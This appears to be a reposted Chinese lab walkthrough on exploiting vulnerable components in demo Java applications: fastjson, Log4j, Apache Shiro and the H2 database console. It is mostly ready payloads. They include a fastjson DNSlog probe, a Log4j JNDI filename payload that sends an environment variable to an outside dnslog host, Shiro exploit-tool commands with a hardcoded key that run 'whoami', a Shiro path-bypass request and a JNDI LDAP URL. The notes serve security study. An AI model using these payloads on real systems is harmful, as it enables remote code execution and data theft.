组件漏洞判定插件
一、Tmall_demo-master(fastjson)
1、配置文件查找安装组件
1、JSON.parse(json)
2、JSON.parseObject
2、找可控的变量
3、利用组件漏洞
poc:propertyJson={"@type":"java.net.Inet4Address","val":"233997ee.log.dnslog.sbs"}
二、Tmall_demo-master(Log4j)
logger.error,logger.info函数触发
1、配置文件查找安装组件
session不可控
2、寻找可控变量
originalFileName从file.getOriginalFilename获取文件名
修改文件名利用漏洞
Poc:filename="${jndi:ldap://${env:OS}.7ffb7b28.log.dnslog.sbs}"
3、Jndi
失败
版本不在区间
三、RuoYi-v4.2(shrio版本漏洞)
/docs;/../admin/
1、密钥setCipherKey
python shiro-exploit.py check -u http://127.0.0.1
2、利用链
python shiro-exploit.py echo -g CommonsCollectionsK1 -u http://127.0.0.1 -v 2 -k fCq+/xW488hMTCD+cmJ3aQ== -c whoami
3、shiro漏洞绕过拦截器
4、/css;/../common/download利用漏洞shiro
GET /css;/../common/download HTTP/1.1
四、halo-0.4.3(h2database)
1、环境配置进入后台
2、访问h2database
javax.naming.InitialContext
ldap://192.168.93.1:1389/9nbcm6
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 | 
